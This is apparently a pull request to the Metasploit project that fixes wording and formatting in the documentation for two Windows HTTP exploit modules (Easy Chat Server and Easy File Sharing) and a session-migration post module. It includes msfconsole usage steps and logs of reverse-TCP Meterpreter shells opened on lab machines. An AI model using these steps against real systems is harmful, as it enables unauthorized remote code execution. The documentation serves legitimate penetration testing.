### PR TITLE
fix some module documentation

### DIFF
--- a/documentation/modules/exploit/windows/http/easychatserver_seh.md
+++ b/documentation/modules/exploit/windows/http/easychatserver_seh.md
@@ -1,16 +1,16 @@
 ## Description
 
-This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability.
+This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
 
-This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application
+This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
 
 ## Vulnerable Application
 
-[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software.
+[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
 
 This module has been tested successfully on
 
-* Easy Chat Server 3.1 on Windows XP En SP3
+ * Easy Chat Server 3.1 on Windows XP En SP3
 
 Installers:
 
@@ -18,11 +18,11 @@ Installers:
 
 ## Verification Steps
 
-1. Start `msfconsole`
-2. Do: `use exploits/windows/http/easychatserver_seh`
-3. Do: `set rhosts [IP]`
-4. Do: `exploit`
-5. You should get your payload executed
+ 1. Start `msfconsole`
+ 2. Do: `use exploits/windows/http/easychatserver_seh`
+ 3. Do: `set rhosts [IP]`
+ 4. Do: `exploit`
+ 5. You should get your payload executed
 
 ## Scenarios
 
@@ -32,11 +32,11 @@ msf > use exploit/windows/http/easychatserver_seh
 msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
 RHOST => 192.168.56.101
 msf exploit(easychatserver_seh) > exploit
- 
+
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [*] Sending stage (957487 bytes) to 192.168.56.101
 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
- 
+
 meterpreter > sysinfo
 Computer    	: MM-8B040C5B05D9
 OS          	: Windows XP (Build 2600, Service Pack 3).
@@ -47,7 +47,7 @@ Logged On Users : 2
 Meterpreter 	: x86/windows
 meterpreter > exit
 [*] Shutting down Meterpreter...
- 
+
 [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
 msf exploit(easychatserver_seh) >
 ```

--- a/documentation/modules/exploit/windows/http/easyfilesharing_post.md
+++ b/documentation/modules/exploit/windows/http/easyfilesharing_post.md
@@ -1,8 +1,8 @@
 ## Description
 
-This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
+This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
 
-This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
+This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
 
 ## Vulnerable Application
 
@@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
 
 This module has been tested successfully on
 
-* Easy File Sharing 7.2 on Windows XP En Sp3
+ * Easy File Sharing 7.2 on Windows XP En Sp3
 
 Installers:
 
@@ -18,11 +18,11 @@ Installers:
 
 ## Verification Steps
 
-1. Start `msfconsole`
-2. Do: `use exploits/windows/http/easyfilesharing_post`
-3. Do: `set rhosts [IP]`
-4. Do: `exploit`
-5. You should get your payload executed
+ 1. Start `msfconsole`
+ 2. Do: `use exploits/windows/http/easyfilesharing_post`
+ 3. Do: `set rhosts [IP]`
+ 4. Do: `exploit`
+ 5. You should get your payload executed
 
 ## Scenarios
 
@@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
 msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
 RHOST => 192.168.56.101
 msf exploit(easyfilesharing_post) > exploit
- 
+
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [*] Sending stage (957487 bytes) to 192.168.56.101
 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
- 
+
 meterpreter > sysinfo
 Computer    	: MM
 OS          	: Windows XP (Build 2600, Service Pack 3).
@@ -47,7 +47,7 @@ Logged On Users : 2
 Meterpreter 	: x86/windows
 meterpreter > exit
 [*] Shutting down Meterpreter...
- 
+
 [*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
 msf exploit(easyfilesharing_post) >
 ```

--- a/documentation/modules/post/windows/manage/archmigrate.md
+++ b/documentation/modules/post/windows/manage/archmigrate.md
@@ -1,5 +1,6 @@
 ## Creating A Testing Environment
-  To use this module you need an x86 executable type meterpreter on a x64 windows machine.
+
+To use this module you need an x86 executable type meterpreter on a x64 windows machine.
 
 This module has been tested against:
 
@@ -23,9 +24,10 @@ This module was not tested against, but may work against:
 
 ### Windows 10 x64
 
+```
     msf exploit(handler) > run
 
-    [*] Started reverse TCP handler on <MSF_IP>:4567 
+    [*] Started reverse TCP handler on <MSF_IP>:4567
     [*] Starting the payload handler...
     [*] Sending stage (957487 bytes) to <Win10x64_IP>
     [*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
@@ -39,8 +41,8 @@ This module was not tested against, but may work against:
     Logged On Users : 2
     Meterpreter     : x86/windows
     meterpreter > background
-    [*] Backgrounding session 1...                
-    msf exploit(handler) > use post/windows/manage/archmigrate 
+    [*] Backgrounding session 1...
+    msf exploit(handler) > use post/windows/manage/archmigrate
     msf post(archmigrate) > set session 1
     session => 1
     msf post(archmigrate) > run
@@ -71,3 +73,4 @@ This module was not tested against, but may work against:
     Domain          : WORKGROUP
     Logged On Users : 2
     Meterpreter     : x64/windows
+```


### PR DESCRIPTION
3 modules got documentation landed in the wrong spot. This also fixes a few
typos and improves formatting.

## Verification

- [x] Start `msfconsole`
- [x] `info -d exploit/windows/http/easychatserver_seh`
- [x] `info -d exploit/windows/http/easyfilesharing_post`
- [x] `info -d post/windows/manage/archmigrate`
- [x] **Verify** that all docs actually appear and are correct
